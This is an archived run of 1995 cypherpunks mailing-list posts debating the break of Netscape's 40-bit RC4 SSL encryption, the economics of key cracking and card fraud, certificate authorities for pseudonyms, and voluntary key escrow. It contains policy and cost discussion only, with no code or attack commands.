From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 18 Aug 95 09:30:50 PDT
To: Lyle Seaman <lws+@transarc.com>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <skB=0EKSMUw880aqY7@transarc.com>
Message-ID: <199508181629.MAA02496@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lyle Seaman writes:
> jordan@Heuristicrat.COM (Jordan Hayes) writes:
> > talking to the right people.  Fraud eats away a big chunk of revenue
> > and can quite significantly affect competitiveness in a market with
> > thin margins.
> 
> The credit card market has thin margins?  That's news to me.

Its true. The issuers often end up making most of their money for a
transaction on the fee and not on the two points off the top -- that
money ends up getting divvied up and lots of it disappears into fraud
costs and other similar places. The other big place they make their
money is on the interest they charge people who don't pay off their
balance every month, but for someone like me who does, they are
indeed earning a fairly small margin.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 18 Aug 95 09:36:57 PDT
To: cypherpunks@toad.com
Subject: SSL challenge and escrows
Message-ID: <9508181635.AA23177@all.net>
MIME-Version: 1.0
Content-Type: text


I think a lot of people miss the distinction between automated message
cracking and dumpster diving.  Dumpster diving is not free.  It costs at
least a dollar each to get credit card slips by dumpster diving. 

Consider that in order to use the information, you have to get the slip,
pull off the numbers, enter them into a computer (or even worse yet,
create a phoney card or make a phone call) in order to use the
information.  The break-even point for an automated cracking and usage
system is more than a dollar per stolen card.  My parallel processor
is actually more cost effective for crimilar theft via credit card fraud.

What does this have to do with escrow?  My escrow offer costs less than
the cost of crimial attack.  If it reduces attack, it is cost effective
and should lower the overall cost of transaction processing.

In fact, I have a friend who says he will escrow keys for free, but he
is less trustworhty than I am, and I think he wants to get his dollar on
the other side.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: panzer@dhp.com (Panzer Boy)
Date: Fri, 18 Aug 95 10:34:08 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
In-Reply-To: <Pine.3.89.9508171031.E16021-0100000@www2.software.net>
Message-ID: <412j0b$6em@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


John Pettitt (jpp@software.net) wrote:
: Huh?  So you run on 120 workstations worth how much?  to steal a credit
: card number worth how much?  Get real - there are hundreds of ways
: to get credit card numbers that cost less.  The idea is to make
: breaking SSL less attractive than dumpster diving not to make it
: impossible.   I'll lay odds that I could get the credit card number
: of *any* individual in the US in less elapsed time and with nothing
: more than a $1000 windoze machinei, a telephone and a modem.

I'll ignore the offer to gamble due to agreeing with you.  However, your
comparision to dumpster diving is kinda weak.  People everytday use
thousands of dollars worth of computer equipment to download pictures from
select newsgroups.  They have spent couple grand to be able to download
and veiw these pictures on their screens.  Now if you told them that they
could just mail order some videos, magazines or the like, they'ld tell
you it's "easier" their way. 

Many people have access to piles and piles of computer horsepower.  
People without that will still do dumpster diving, but bored sys-admins, 
college students, college-professors, office workers, etc will still have 
easy access to this type of computing power.

The problem also lays in the fact that people are led to believe that 
their information is safe against most attacks, when it's obvious that 
this information is only safe for a very short time.

Has anyone thought about starting up a distributed rc4 cracking web.  
Send in your message to a web server form, it will then spawn of requests 
to a pool of machines willing to try cracking rc4 for you.  Allow anyone 
to offer up spare cycles towards the effort.

-- 
 -Matt     (panzer@dhp.com)                         DI-1-9026
 "That which can never be enforced should not be prohibited."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 18 Aug 95 10:39:56 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Netscape security
Message-ID: <9508181739.AA21179@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>        There is no word as to how to become a KSA.  Netscpe has
>ignored the question on several occaisons.

I'm fairly sure that I remember Taher saying at the W3C security
meeting that they intend to do this, and that hardcoding the CA's
into the library was as quick hack.  I also have the impression
that they don't know how to do it, but my recollection is fuzzier there.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Fri, 18 Aug 95 11:50:52 PDT
To: Panzer Boy <panzer@dhp.com>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <412j0b$6em@dhp.com>
Message-ID: <Pine.BSI.3.91.950818134417.12747C-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


On 18 Aug 1995, Panzer Boy wrote:

> John Pettitt (jpp@software.net) wrote:
> : Huh?  So you run on 120 workstations worth how much?  to steal a credit
> : card number worth how much?  Get real - there are hundreds of ways
> : to get credit card numbers that cost less.  
> 
> Has anyone thought about starting up a distributed rc4 cracking web.  
> Send in your message to a web server form, it will then spawn of requests 
> to a pool of machines willing to try cracking rc4 for you.  Allow anyone 
> to offer up spare cycles towards the effort.
> 

I suggested that very thing just yesterday in the list, but my message
seems to have gone awry.  In short, I suggested we use E-Cash payments
for cracking efforts.  This would establish a reward for participating
and an 'exchange rate' for e-cash at the same time.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Fri, 18 Aug 95 04:54:32 PDT
To: cypherpunks@toad.com
Subject: Article in Time Magazine
Message-ID: <9508181150.AA03711@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


In the Time Magazine of this week there is an article about a new way
to make war. Instead of sending bombs, tanks, and soldiers, the
enemies computers and communication networks are attacked by sending
viruses and worms and by using backdoors to sabotage the infra structure.

How many exported software products might have backdoors,
vulnerabilities, and hidden procedures which are harmfull if ever
activated?

Any opinions?

Hadmut 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous
Date: Tue Sep 07 12:50:25 1999
Subject: No Subject
Message-ID: <d41d8cd98f00b204e9800998ecf8427e@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <9508181739.AA21179@sulphur.osf.org>, rsalz@osf.org (Rich Salz) writes:
> >        There is no word as to how to become a KSA.  Netscpe has
> >ignored the question on several occaisons.
> 
> I'm fairly sure that I remember Taher saying at the W3C security
> meeting that they intend to do this, and that hardcoding the CA's
> into the library was as quick hack.  I also have the impression
> that they don't know how to do it, but my recollection is fuzzier there.

  It has been stated publicly several times that we do plan to allow
user configurable certificate authority and server trust.  A user
will be able to configure their browser to talk to servers that have
certificates signed by any CA they choose to trust.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Fri, 18 Aug 95 12:13:17 PDT
To: David Neal <dneal@usis.com>
Subject: Re: SSL challenge -- broken !
Message-ID: <v01510100ac5aa405a6e4@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


David Neal wrote:
>On 18 Aug 1995, Panzer Boy wrote:
>> John Pettitt (jpp@software.net) wrote:
>> : Huh?  So you run on 120 workstations worth how much?  to steal a credit
>> : card number worth how much?  Get real - there are hundreds of ways
>> : to get credit card numbers that cost less.
>>
>> Has anyone thought about starting up a distributed rc4 cracking web.
>> Send in your message to a web server form, it will then spawn of requests
>> to a pool of machines willing to try cracking rc4 for you.  Allow anyone
>> to offer up spare cycles towards the effort.
>>
>
>I suggested that very thing just yesterday in the list, but my message
>seems to have gone awry.  In short, I suggested we use E-Cash payments
>for cracking efforts.  This would establish a reward for participating
>and an 'exchange rate' for e-cash at the same time.

I'd we willing to set up a "crackweb" mailing list, or perhaps a site to
register your machine(s) with % available and MIPS ratings.

DJK






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 18 Aug 95 11:23:20 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508181629.MAA02496@frankenstein.piermont.com>
Message-ID: <Pine.3.89.9508181449.A623131443-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 18 Aug 1995, Perry E. Metzger wrote:
> > The credit card market has thin margins?  That's news to me.
> 
> Its true. The issuers often end up making most of their money for a

actually the NYT reported this week that banks make super-profits on 
credit cards.  economists are not sure why the margins are about 3 times 
that of other lines of biz.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 18 Aug 95 14:26:28 PDT
To: Michael Froomkin <cypherpunks@toad.com
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <ac5a50771d0210045def@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:47 PM 8/18/95, Michael Froomkin wrote:
>I have a question which is of course purely hypothetical.
>
>Suppose you were designing the legal framework that would govern the
>operation of Certification Authorities (the people who issue certificates
>vouching for public keys used for digitial signatures), called CAs for
>short.  The CAs will operate in a hierarchical model (not a
>PGP-web-of-trust model), with a state agency being at the root, and
>issuing certificates for private CAs.

I don't see any basis for having a state agency as the root...lots of
things that are grounded in law have no origin/connection to the state.
But, I'll assume your hypothetical (though I think the assumption that
government = root leads down a dangerous path).

>You have decided to allow the private CAs to issue certificates of varying
>degrees of corroberation so long as the degree of verification used is
>deducible from the certificate.  E.g. a certificate might say "we check
>the passport"; or "we check driver's license" or "we took blood, hair,
>fingprint, retinal scan and first-born child".  It might even say "we
>checked nothing".  You have also decided that a CA may issue a certificate
>in the name of a pseudonym, so long as the CA retains information about
>the True Name.  Now the issue arises as to whether one should allow the CA
>to issue certificates to pseudonyms where it has *no record* of the real
>identity of the person proffering the key pair.

It all depends on what the purpose of certification is in the first place,
and whether alternative heierarchies of certification exist outside the one
that has government as root. For example, I may instantiate many keys for
use in experiments, or as agents in a market microworld, and I may "vouch"
for them.

These "agents" have no True Name, are not persons, but still have varying
levels of certification  (to me, at least)

A company may even have multiple agents. Multiple departments, multiple
users, etc.

The web-of-trust model, which, loosely phrased, says "I say I believe this
is the key of so-and-so, and you can believe me or not. We don't need no
steenking badges!" The beauty of this is that any person or program can
generate lots and lots of keys, for experiments, agents, etc.

Now if it is desired to have the "legal system" mesh with this
certification process, the governemnt is still not needed. Contract law
suffices. If the Alice Corporation claims the Bob Company signed a document
with a fraudulent key )or whatever the scenario might be), then each side
can present in a court what the contracts they agreed to said and what the
facts were.

This happens all the time, though "I am not a lawyer," in disputes about
whether a contract was signed properly, about whether the signer had the
right authority, etc. And it is apparently not necessary to have the
"state" establish itself, for example, as the keeper of signatures.

I concede that there is a path back to the legal "is-a-person" status of
parties, such as credentials for identity.

In cases involving software agents and "virtual persons" (which is where
key certification tends to come in), a stipulation can be made that a Real
Person is to be involved in the loop.


>Is there any reason why a person would want such a certificate?  In other
>words, given that the recipient of a digital signature will easily be
>able to check the value of the certificate (nil), won't the
>transaction/communication be in all ways identical to one where there was
>no certificate at all.  So is anything of value lost by prohibiting such
>a certificate?

So long as I am not prohibited from getting together with others (on a list
like our, in a corporation, with offshore folks, etc.) and setting up our
own system--of whatever nature--then I suppose it doesn't matter.

But you ask "So is anything of value lost by prohibiting such a certificate?"

Well, why prohibit something unless a real and compelling problem exists?
it might turn out to be very useful to have certificates even for keys that
belong to entities or agents that have no True Name attached to them. I've
given some examples, and can think of more.


--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 18 Aug 95 14:37:46 PDT
To: cypherpunks@toad.com
Subject: Economic Model for Key Cracking
Message-ID: <v02120d07ac5ac3256b91@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



So far, list members have mostly presented two points of view on the
economics of key cracking:

  o It's free, since it uses spare CPU cycles
  o It should be priced at the cost of the dedicated computer
    hardware needed to do it.

Both of these approaches are wrong. The first approach fails because
it doesn't scale -- there probably aren't enough people willing to
crack lots of keys purely for the research interest, hack value, or the
goodness of their heart.

At the same time, many people and companies have lots of unused CPU
time on their hands. Economically, this CPU time is scrap material --
and there are companies out there that do nothing but buy up scrap
equipment for pennies on the dollar.

Therefore it should be possible to create a market in spare CPU cycles
for tasks like this that require massive parallel computing. An
earlier suggestion for bounties on keys (basically the Chinese lottery
approach) is a step in this direction.

I'd also like to point out that a hacker who can sniff out SSL-encrypted
packets on a hacked network is going to be vastly harder to catch than
someone who trolls through his or her physical community dumpster diving
and bribing clerks. The ability to anonymously gather and decrypt credit
card numbers has a vastly lower "cost" in terms of likelyhood of
prosecution. If it drops down to under $100 per key, it's probably at a
good break-even point to do it wholesale. Certainly the out-of-pocket
cost of cracking a 40-bit SSL key is less than that right now for a
great many people, even without creating a market.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Childers James <ic58@jove.acs.unt.edu>
Date: Fri, 18 Aug 95 12:48:24 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks' ideal escrow agent
Message-ID: <Pine.SOL.3.91.950818144033.6796A-100000@jove.acs.unt.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've seen the idea of voluntary key escrow discussed before on this list. 
(And no, not the government's idea of "voluntary", either.) A question I 
would raise is this: What would be the ideal setup for an escrow agency? 
If I were to open up an agency for business, what would be some 
characteristics you would look for?


"Freedom is meaningless unless  | ic58@jove.acs.unt.edu - James Childers
 you can give to those with whom| No man's freedom is safe
 you disagree." - Jefferson     |    while Congress is in session
        EA 73 53 12 4E 08 27 6C   21 64 28 51 92 0E 7C F7





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 18 Aug 95 11:48:07 PDT
To: cypherpunks@toad.com
Subject: Certificates/Anonymity/Policy/True Names
Message-ID: <Pine.3.89.9508181423.A623131443-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have a question which is of course purely hypothetical.

Suppose you were designing the legal framework that would govern the 
operation of Certification Authorities (the people who issue certificates 
vouching for public keys used for digitial signatures), called CAs for 
short.  The CAs will operate in a hierarchical model (not a 
PGP-web-of-trust model), with a state agency being at the root, and 
issuing certificates for private CAs.

You have decided to allow the private CAs to issue certificates of varying
degrees of corroberation so long as the degree of verification used is
deducible from the certificate.  E.g. a certificate might say "we check
the passport"; or "we check driver's license" or "we took blood, hair,
fingprint, retinal scan and first-born child".  It might even say "we
checked nothing".  You have also decided that a CA may issue a certificate
in the name of a pseudonym, so long as the CA retains information about
the True Name.  Now the issue arises as to whether one should allow the CA
to issue certificates to pseudonyms where it has *no record* of the real
identity of the person proffering the key pair. 

Is there any reason why a person would want such a certificate?  In other 
words, given that the recipient of a digital signature will easily be 
able to check the value of the certificate (nil), won't the 
transaction/communication be in all ways identical to one where there was 
no certificate at all.  So is anything of value lost by prohibiting such 
a certificate?

I understand, of course, that in a world where the CA has no duty to 
check the client's representations, there is a somewhat farcical element 
to this debate, but this hypothetical problem involves group decision 
making and groups find themselves debating irrational things.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Fri, 18 Aug 95 11:53:55 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Netscape security
In-Reply-To: <199508180750.AAA27087@ix4.ix.netcom.com>
Message-ID: <199508181852.OAA12523@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri Aug 18 03:51:20 1995: you scribbled...
> 
> Mr. Shank - I'm a bit disappointed by your posting about the RC4-40 crack.

<stuff deleted>

After following the threads that have gone on after the SSL/RC4 cracking, 
It seems that we are going about this all wrong.  The cypherpunks and
Netscape shouldn't be at odds about this event.  It would be in everyone's
best interest to join forces against the common foe (ITAR), and try to
prove to the feds that RC4-40 just plain isn't good enough.  

For example, if Netscape (or someone else) were to issue a challenge to
break an SSL Key as fast as possible, and then the cypherpunks did just
that in say...a few hours, it could make a very big statement.  

It seems that one of the problems with Damien's cracking job was that it
was "not sanctioned".  Look at the WSJ article, they didn't mention his
name...they just called him "a hacker".  It shows how public opinion still
sees groups like the cypherpunks as just that, a bunch of punks. 

With some "respected" business on our side, it may make a much bigger
impact (better publicity, better leverage, etc.).

Maybe i'm just dreaming...

...tango...



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Fri, 18 Aug 95 12:00:45 PDT
To: mfroomki@umiami.ir.miami.edu (Michael Froomkin)
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <Pine.3.89.9508181423.A623131443-0100000@umiami.ir.miami.edu>
Message-ID: <9508181854.AA02742@joplin.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| I have a question which is of course purely hypothetical.

[Description of a certificate with no backing deleted.]

| Is there any reason why a person would want such a certificate?  In other 
| words, given that the recipient of a digital signature will easily be 
| able to check the value of the certificate (nil), won't the 
| transaction/communication be in all ways identical to one where there was 
| no certificate at all.  So is anything of value lost by prohibiting such 
| a certificate?

	I'll turn the question around, and ask, is anything of value
gained by prohibiting such a thing?  If not, why not let people pay
for worthless things, should people so desire?

	Does the Government have a duty to prevent us from wasting our
time or money?

	On another tack, I'll say, yes, there is something of value
lost, and that is the easy creation of pseudonyms.  Pseudonyms are
useful for the creation of a persistant, although untraceable
identity.  Having those identities in the certification tree is, I
suspect, as good a thing as the CA as a whole.  

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Fri, 18 Aug 95 12:02:59 PDT
To: koontz@MasPar.COM (David G. Koontz)
Subject: Re: Netscape security
In-Reply-To: <9508181832.AA21899@argosy.MasPar.COM>
Message-ID: <9508181856.AA02769@joplin.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| One tends to wonder if there are analytical methods to reduce the search
| space.

	I suspect that the PRNG used by Netscape navigator might yeild
up some clues if someone were to disassemble it.  One might see if
secret_key_data and public_key_data are derived from the same seeds.


Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 18 Aug 95 12:03:14 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <Pine.3.89.9508181449.A623131443-0100000@umiami.ir.miami.edu>
Message-ID: <199508181902.PAA03032@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Froomkin writes:
> On Fri, 18 Aug 1995, Perry E. Metzger wrote:
> > > The credit card market has thin margins?  That's news to me.
> > 
> > Its true. The issuers often end up making most of their money for a
> 
> actually the NYT reported this week that banks make super-profits on 
> credit cards.  economists are not sure why the margins are about 3 times 
> that of other lines of biz.

The overall business is very profitable. The margins on transactions
are very thin.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kari Laine" <buster@klaine.pp.fi>
Date: Mon, 21 Aug 95 21:16:19 PDT
To: cypherpunks@toad.com
Subject: Re: Article in Time Magazine
Message-ID: <199508220416.AA03981@personal.eunet.fi>
MIME-Version: 1.0
Content-Type: text/plain



> How many exported software products might have backdoors,
> vulnerabilities, and hidden procedures which are harmfull if ever
> activated?

I am not saying it is so I am just speculating

Windows ?

Microcode of big host systems like the one from IBM?

Each mainframe comes with a line attached. Customer
typically don't have the faintest idea what is going on 
that line. I know one customer who stuck a printer 
there and though - now we will see ... well he ended
up with printouts he did not have the faintest idea
of their context.

Now does anyone has real evidence of possible
backdoors?

Best Regards
Kari
Kari Laine          buster@klaine.pp.fi
LAN Vision Oy       Tel. +358-0-502 1947
Sinikalliontie 14   Fax  +358-0-524 149
02630 ESPOO         BBS  +358-0-502 1576/1456
FINLAND




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Fri, 18 Aug 95 07:07:30 PDT
To: cypherpunks@toad.com
Subject: Re:  Cost to Crack Keys
Message-ID: <9508181407.AA07951@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


This is how you can crack SSL RC4-40 sessions for $1000 each:

Go to your bank and get a $250,000 loan over 10 years.  Assuming a 10%
interest rate, you will have to pay about $40,000 per year.  Use the
$250,000 to buy 50 low-cost high-speed pentium PCs.  Don't bother with
a screen, keyboard or mouse.  Get the minimum of memory.  Get a huge
discount (you're a really good client).

Pay $10,000 for the electricity bill, the real-estate rent, etc.

The machines will crack 50 keys per year on average.  They cost you
$50,000 per year.

That's $1,000 per key.

Does anyone see any hole in the above plan ?  It seems to me that
Netscape's estimate is one order of magnitude too high.

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Conlen <meconlen@IntNet.net>
Date: Fri, 18 Aug 95 13:16:51 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <Pine.3.89.9508181449.A623131443-0100000@umiami.ir.miami.edu>
Message-ID: <Pine.SV4.3.91.950818160146.15493A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 18 Aug 1995, Michael Froomkin wrote:

> On Fri, 18 Aug 1995, Perry E. Metzger wrote:
> > > The credit card market has thin margins?  That's news to me.
> > 
> > Its true. The issuers often end up making most of their money for a
> 
> actually the NYT reported this week that banks make super-profits on 
> credit cards.  economists are not sure why the margins are about 3 times 
> that of other lines of biz.

Thats the business of banking. In any case most business run tight net 
margins. Over half of the gross margin in Retail Electronics dissapears, 
and in some markets like Los Angeles, its as low as 6 or 7 percent.

The Credit card companys dont have a whole lot to worry about other then 
public image, and only a few like American Express worrys about this 
alot. A large portion of phone calls paid for by credit cards are 
declined for payment. Its the establishment that didnt check the person 
using the card that looses out. Mail order business take the loss when a 
computer is carded, beacuse they dont have a signature on hand to back up 
the charge. The credit card company dosent take the hit at all. American 
Express is the toughest of all the companys that I have delt with. While 
I can steal a card in the mail, sign it, and use it, at which case the 
person who the card was intended for can be held liable for the bill, 
AmEx requires that teh person who's name is on the card sign for the 
charge. Basicaly what it comes down to is, card companys and banks dont 
take the hit unless they want to for public image and customer service. 
What do they care if their card is being used by someone who shouldnt 
have it. They can decline payment at will without a signature. 

I in some ways hope using credit cards on the net takes off, is abused, 
and people go back to using cash, and checks, and buying things in 
person. 


						Groove on Dude
						Michael Conlen
						meconlen@intnet.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Fri, 18 Aug 95 13:23:58 PDT
To: ic58@jove.acs.unt.edu (Childers James)
Subject: Re: Cypherpunks' ideal escrow agent
In-Reply-To: <Pine.SOL.3.91.950818144033.6796A-100000@jove.acs.unt.edu>
Message-ID: <9508182017.AA03042@joplin.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| I've seen the idea of voluntary key escrow discussed before on this list. 
| (And no, not the government's idea of "voluntary", either.) A question I 
| would raise is this: What would be the ideal setup for an escrow agency? 
| If I were to open up an agency for business, what would be some 
| characteristics you would look for?

	From the top down:

	I'd want to see a board of directors with several well known,
well respected cypherpunks on it.  I wouldn't trust 'Joe the
cypherpunks' escrow agency any farther than I could throw it, becuase
I expect the FBI and NSA will both set them up as stings.

	I'd want to see it well financed; legal fees will not be small
if the KEA is really on my side.

	A few good technical people involved to make sure that the
actual key databases are well encrypted and protected, and that
individual keys can be extracted without extracting an entire
database.  If I was actually going to extract keys, I'd want to see a
two or three passphrase extraction procedure, so that theres no single
point of bribery/extortion.

	A nice location in an offshore banking haven.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Howard Cheng <howard@cs.ualberta.ca>
Date: Fri, 18 Aug 95 15:29:56 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Economic Model for Key Cracking
In-Reply-To: <v02120d07ac5ac3256b91@[199.2.22.120]>
Message-ID: <95Aug18.162938-0600_mdt.13069-7+113@scapa.cs.ualberta.ca>
MIME-Version: 1.0
Content-Type: text/plain


Douglas Barnes wrote:
> 
> At the same time, many people and companies have lots of unused CPU
> time on their hands. Economically, this CPU time is scrap material --
> and there are companies out there that do nothing but buy up scrap
> equipment for pennies on the dollar.
> 
> Therefore it should be possible to create a market in spare CPU cycles
> for tasks like this that require massive parallel computing. An
> earlier suggestion for bounties on keys (basically the Chinese lottery
> approach) is a step in this direction.
> 

One can set up a workload distributor this way:

 Distribute work when a request is received.
 When the final results come back, pay the worker e-cash.

We need to make sure that someone did do the work honestly, but I don't know
how to check this (other than doing the work yourself to confirm the results,
but this defeats the whole point of the system).  Perhaps we should require
that people buy the work first, and when they report the results, they get 
the money back + some profits.  

Assuming everyone is honest, I am sure many people in businesses
wouldn't mind making money this way.  Most business machines are
completely idle/turned off after working hours anyway.

Now we just need to convince the business people to help us.  Not
everyone is honest, and so this may be a bit difficult to do.  If I
were a business person without much computer knowledge, I probably
wouldn't trust someone running programs on my computer.  What if the
program scans all my business secrets and distributes them world-wide,
or what if the program is some sort of a virus?  I could get some
computer consultants to check the program's source code, but this
would be too much trouble.

Anyway, I think this would be the attitude of an average business
person.  Therefore, it will not be very easy to convince a lot of
people to donate their spare cycles.

Howard

-- 
Howard Cheng                     e-mail: hcheng@gpu.srv.ualberta.ca
University of Alberta                    howard@cs.ualberta.ca
3rd year Honors Comp. Sci.       URL   : http://ugweb.cs.ualberta.ca/~hcheng
Finger hcheng@amisk.cs.ualberta.ca for PGP public key.

Algebraic symbols are used when you do not know what you are talking about.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 18 Aug 95 13:40:53 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <9508181854.AA02742@joplin.harvard.edu>
Message-ID: <Pine.3.89.9508181654.A623135137-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 18 Aug 1995, Adam Shostack wrote:

> 	I'll turn the question around, and ask, is anything of value
> gained by prohibiting such a thing?  If not, why not let people pay
> for worthless things, should people so desire?
> 
because you have to pick your fights. If nothing's lost, there are other 
fish to fry.


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 18 Aug 95 16:45:16 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <199508182342.QAA20924@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:47 PM 8/18/95 -0400, Michael Froomkin writes about CAs,
and asks why a CA or customer would want a certificate for
a pseudonym without any identification or True Name.
>given that the recipient of a digital signature will easily be 
>able to check the value of the certificate (nil), won't the 
>transaction/communication be in all ways identical to one where there was 
>no certificate at all.  So is anything of value lost by prohibiting such 
>a certificate?

It's useful for a couple of reasons 
1) Continuity - For a single transaction, it doesn't make much difference;
for multiple transactions/communications it does.  
If you want to use the nym JohnDoe, and you register with keys.com, 
you can do repeated transactions (e.g. posting to the net) as JohnDoe/keys.com,
and nobody can impersonate you as long as keys.com doesn't allow duplicates.
This allows people to build reputations under pseudonyms, and do repeat
business or have readers bother to read their postings.

Without certification (whether web-based or hierarchy-based),
you're stuck with always posting your messages with a given key
and hoping people can decide whether they've really got yours or
some other JohnDoe.  Our local Black Unicorn is this way - 
few of us know his True Name, but his reputation is established.
On the other hand we can't really tell if the many postings by the
L-Name are from a single person, a cooperating group, or imposters
who decided it would be fun to borrow his reputation for the day.
Tim May has occasionally proposed that the key is really all that matters,
and that the name tacked onto it is just an untrustable convenience, but I'd
say that certification does increase that convenience by adding some trust. 

